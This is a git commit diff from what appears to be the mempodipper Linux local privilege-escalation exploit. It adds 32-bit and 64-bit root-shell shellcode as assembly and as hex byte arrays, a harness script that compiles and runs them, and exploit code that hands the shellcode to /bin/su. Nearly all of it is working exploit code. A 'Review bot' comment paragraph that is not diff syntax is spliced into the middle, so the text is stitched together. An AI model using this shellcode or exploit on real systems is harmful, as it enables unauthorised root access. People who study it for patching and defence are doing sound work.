authorJason A. Donenfeld <Jason@zx2c4.com>2012-01-22 06:16:39 +0100
committerJason A. Donenfeld <Jason@zx2c4.com>2012-01-22 06:16:39 +0100
commit14b33f1b7c5c761cc089dede4fa6aeb187ff66ac (patch)
treedf5f2aed70c872d7bc3059e2dc6de6c78fb17f90
parentAdd custom 64bit shellcode and preserve stderr. (diff)
Add 32bit shellcode.
-rwxr-xr-xbuild-and-run-shellcode.sh6
-rw-r--r--harness.c7
-rw-r--r--mempodipper.c12
-rwxr-xr-xrun-shellcode.sh2
-rw-r--r--shellcode-32.s53
-rw-r--r--shellcode-64.s4
6 files changed, 76 insertions, 8 deletions
diff --git a/build-and-run-shellcode.sh b/build-and-run-shellcode.sh
new file mode 100755
index 0000000..0a8a34b
--- /dev/null
+++ b/build-and-run-shellcode.sh
@@ -0,0 +1,6 @@
+#!/bin/sh
+if [ "$1" == "32" ]; then
+ nasm -o /dev/stdout shellcode-32.s | msfencode4.0 -t c -e generic/none -b '\x00' > harness.c && echo "void main() { (*(void(*)())buf)(); }" >> harness.c && gcc -m32 -fno-stack-protector -z execstack -o harness harness.c && ./harness
+else
+ nasm -o /dev/stdout shellcode-64.s | msfencode4.0 -t c -e generic/none -b '\x00' > harness.c && echo "void main() { (*(void(*)())buf)(); }" >> harness.c && gcc -fno-stack-protector -z execstack -o harness harness.c && ./harness
+fi
diff --git a/harness.c b/harness.c
new file mode 100644
index 0000000..10bf6ce
--- /dev/null
+++ b/harness.c
@@ -0,0 +1,7 @@
+unsigned char buf[] =
+"\x48\x31\xff\xb0\x69\x0f\x05\x48\x31\xff\xb0\x6a\x0f\x05\x40"
+"\xb7\x06\x40\xb6\x02\xb0\x21\x0f\x05\x48\xbb\x2f\x2f\x62\x69"
+"\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xdb"
+"\x66\xbb\x2d\x69\x53\x48\x89\xe1\x48\x31\xc0\x50\x51\x57\x48"
+"\x89\xe6\x48\x31\xd2\xb0\x3b\x0f\x05";
+void main() { (*(void(*)())buf)(); }
diff --git a/mempodipper.c b/mempodipper.c
index 1fb8cc2..fb20c26 100644
--- a/mempodipper.c
+++ b/mempodipper.c
@@ -203,24 +203,28 @@ int main(int argc, char **argv)
lseek64(fd, offset, SEEK_SET);
#if defined(__i386__)
- // Shellcode from: http://www.shell-storm.org/shellcode/files/shellcode-599.php
+ // See shellcode-32.s in this package for the source.
char shellcode[] =
- "\x6a\x17\x58\x31\xdb\xcd\x80\x50\x68\x2f\x2f\x73\x68\x68\x2f"
- "\x62\x69\x6e\x89\xe3\x99\x31\xc9\xb0\x0b\xcd\x80";
+ "\x31\xdb\xb0\x17\xcd\x80\x31\xdb\xb0\x2e\xcd\x80\xb3\x06\xb1"
+ "\x02\xb0\x3f\xcd\x80\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f"
+ "\x2f\x62\x69\x89\xe3\x31\xd2\x66\xba\x2d\x69\x52\x89\xe0\x31"
+ "\xd2\x52\x50\x53\x89\xe1\x31\xd2\x31\xc0\xb0\x0b\xcd\x80";
+
#elif defined(__x86_64__)
+ // See shellcode-64.s in this package for the source.
char shellcode[] =
"\x48\x31\xff\xb0\x69\x0f\x05\x48\x31\xff\xb0\x6a\x0f\x05\x40"
"\xb7\x06\x40\xb6\x02\xb0\x21\x0f\x05\x48\xbb\x2f\x2f\x62\x69"
"\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xdb"
"\x66\xbb\x2d\x69\x53\x48\x89\xe1\x48\x31\xc0\x50\x51\x57\x48"
"\x89\xe6\x48\x31\xd2\xb0\x3b\x0f\x05";
+
#else
#error "That platform is not supported."
#endif
printf("[+] Executing su with shellcode.\n");
execl("/bin/su", "su", shellcode, NULL);
} else {
- sleep(0.01);
char pid[32];
sprintf(pid, "%d", parent_pid);
printf("[+] Executing child from child fork.\n");
diff --git a/run-shellcode.sh b/run-shellcode.sh
deleted file mode 100755
index 5ffcf39..0000000
--- a/run-shellcode.sh
+++ /dev/null
@@ -1,2 +0,0 @@
-#!/bin/sh
-nasm -o /dev/stdout shellcode-64.s | msfencode4.0 -t c -e generic/none -b '\x00' > harness.c && echo "void main() { (*(void(*)())buf)(); }" >> harness.c && gcc -fno-stack-protector -z execstack -o harness harness.c && ./harness
diff --git a/shellcode-32.s b/shellcode-32.s
new file mode 100644
index 0000000..d08b93f
--- /dev/null
+++ b/shellcode-32.s
@@ -0,0 +1,53 @@
+BITS 32
+; This shell code sets uid and gid to 0 and execs a shell in interactive mode.
+; It also reopens stderr that was previously saved inside fd 6, for use with mempodipper.
+;
+; by zx2c4
+
+
+;setuid(0)
+xor ebx,ebx
+mov al,0x17
+int 0x80
+;setgid(0)
+xor ebx,ebx
+mov al,0x2e
+int 0x80
+;dup2(6, 2)
+mov bl,0x6
+mov cl,0x2
+mov al,0x3f
+int 0x80
+
+
+
+; execve("//bin/sh", ["//bin/sh", "-i", 0], 0)
+xor eax,eax ; eax = 0
+push eax ; push eax
+push 0x68732f6e ; push //bin/sh
+push 0x69622f2f
+mov ebx,esp ; set ebx (arg 1) to top of stack
+
+xor edx,edx ; edx = 0
+mov dx,'-i' ; edx = '-i'
+push edx ; push edx to stack
+mov eax,esp ; set eax to top of stack
+
+xor edx,edx ; edx = 0
+
+; so at this point:
+; ebx is a pointer to '//bin/sh'
+; eax is a pointer to '-i'
+; edx is null
+; since they are all the same size, we'll push them on the stack
+; and then it will be an array:
+push edx ; push edx to stack
+push eax ; push eax to stack
+push ebx ; push ebx to stack
+mov ecx,esp ; set ecx (arg 2) to top of stack
+
+xor edx,edx ; rdx (arg 3) = 0
+
+xor eax,eax
+mov al,0xb ; al = 0x3b, which is the exec call
+int 0x80
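Review bot: The comment on the final `mov al,0xb` reads `al = 0x3b, which is the exec call`, but 0x3b is the x86-64 number carried over from shellcode-64.s; the value this 32-bit file actually loads is 0xb, so the comment should read `; al = 0xb, which is the exec call (sys_execve on i386)`. The comment on the preceding `xor edx,edx` has the same origin: it says `rdx (arg 3) = 0` where the register in this file is `edx`, so `; edx (arg 3) = 0` would match the instruction. Both are comment-only corrections; the instructions themselves are consistent with the header description and need no change. Keeping the two .s files' comments in step matters here because mempodipper.c now points readers to these files as the source of its byte strings.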
diff --git a/shellcode-64.s b/shellcode-64.s
index 2514ed2..f465c5d 100644
--- a/shellcode-64.s
+++ b/shellcode-64.s
@@ -19,13 +19,13 @@ mov sil,0x2
mov al,0x21
syscall
-; execve("//bin/sh", ["//bin/sh", "-i", 0], 0)
+; execve("/bin/sh", ["/bin/sh", "-i", 0], 0)
mov qword rbx,'//bin/sh' ; rbx = //bin/sh
shr rbx,0x8 ; remove leading / from rbx
push rbx ; push rbx to stack
mov rdi,rsp ; set rdi (arg 1) to top of stack
-xor rbx,rbx
+xor rbx,rbx ; rbx = 0
mov bx,'-i' ; rbx = '-i'
push rbx ; push rbx to stack
mov rcx,rsp ; set rcx to top of stack